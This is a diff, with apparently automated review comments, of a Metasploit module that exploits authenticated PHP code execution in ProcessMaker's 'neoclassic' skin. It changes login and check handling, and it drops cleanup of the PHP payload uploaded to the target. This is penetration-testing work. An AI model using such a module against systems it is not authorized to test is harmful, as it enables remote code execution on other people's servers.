diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb
index a58c8aaa4a..a507b478c6 100644
--- a/modules/exploits/multi/http/processmaker_exec.rb
+++ b/modules/exploits/multi/http/processmaker_exec.rb
@@ -15,12 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution",
 'Description' => %q{
- This module exploits a PHP code execution vulnerability in the
+ This module exploits a PHP code execution vulnerability in the
 'neoclassic' skin for ProcessMaker Open Source which allows any
- authenticated user to execute PHP code.
-
- The vulnerable skin is installed by default in version 2.x and
- cannot be removed via the web interface.
+ authenticated user to execute PHP code. The vulnerable skin is
+ installed by default in version 2.x and cannot be removed via
+ the web interface.
 },
 'License' => MSF_LICENSE,
 'Author' => 'Brendan Coles ',
@@ -54,19 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
 ], self.class)
 end
 
- #
- # Clean up on new session
- #
- def on_new_session(client)
- print_warning("#{peer} - Deleting #{@fname}")
- if client.type == "meterpreter"
- client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
- client.fs.file.rm(@fname)
- else
- client.shell_command_token("rm #{@fname}")
- end
- end
-
 #
 # Send command for execution
 #
@@ -116,11 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
 print_error("#{peer} - Connection failed")
+ return false
 end
 
 if res and res.code == 200 and res.body =~ /Loading styles and images/
 print_good("#{peer} - Authenticated as user '#{user}'")
+ return true
 else
- fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
+ print_error("#{peer} - Authenticating as user '#{user}' failed")
+ return false
 end
 end
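Review bot: The rescue branch that now does `print_error(...)` followed by `return false` makes a transport failure indistinguishable from a rejected credential for `login`'s callers, and `exploit` later in this diff turns that `false` into `fail_with(Failure::NoAccess, ...)`, so an unreachable or timed-out host is reported as an authentication failure. A small way to keep the two apart is to `return nil` from the rescue and reserve `false` for the `else` branch; both callers' `unless login(...)` guards still trip, and `exploit` can then report `Failure::Unreachable` when the result is `nil`, matching what the payload path already does. The success condition `if res and res.code == 200 and res.body =~ /Loading styles and images/` would also read better with `&&`, the idiomatic boolean operator (inside an `if` the behaviour is the same). The enclosing `login` method begins before this hunk.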
@@ -130,7 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 # login
 @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
- login(datastore['USERNAME'], datastore['PASSWORD'])
+ unless login(datastore['USERNAME'], datastore['PASSWORD'])
+ return Exploit::CheckCode::Unknown
+ end
 
 # send check
 fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
@@ -140,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if res and res.body =~ /#{fingerprint}/
 return Exploit::CheckCode::Vulnerable
 elsif res
- return Exploit::CheckCode::Detected
+ return Exploit::CheckCode::Safe
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
 print_error("#{peer} - Connection failed")
@@ -172,14 +163,16 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
 end
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
- fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+ fail_with(Failure::Unreachable, "#{peer} - Connection failed")
 end
 end
 
 def exploit
 # login
 @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
- login(datastore['USERNAME'], datastore['PASSWORD'])
+ unless login(datastore['USERNAME'], datastore['PASSWORD'])
+ fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+ end
 
 # upload payload
 @fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
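Review bot: Returning `Exploit::CheckCode::Safe` whenever `res` is truthy but the fingerprint is absent is a stronger claim than the `Detected` it replaces, yet the only thing the `elsif res` branch tests is that a response object exists. A non-200 reply (the session bounced back to the login page, a server error, a differing skin path) would then be reported as Safe, a false negative from a check that has already authenticated successfully. Consider narrowing it to `elsif res and res.code == 200` so that only a well-formed page lacking the fingerprint counts as Safe and anything else falls through to the method's default return, which lies outside this hunk. The `check` method begins before this hunk.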
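Review bot: Nothing in the new `exploit` path replaces the cleanup this commit removes with `on_new_session`, so the PHP file uploaded as `@fname` stays in the target's web root after the session is established unless the module registers it for deletion somewhere else in the change (for example with the framework's FileDropper mixin, `register_file_for_cleanup(@fname)` once the server-side path is known, if that mixin is included). An executable file left behind that any authenticated user could have dropped is an artifact the operator now has to track and remove by hand. If the removal is intentional, a comment at `@fname = ...` such as `# NOTE: the dropped file is not removed automatically; delete it after the session is established` would make that explicit. The `exploit` method continues past the end of this hunk.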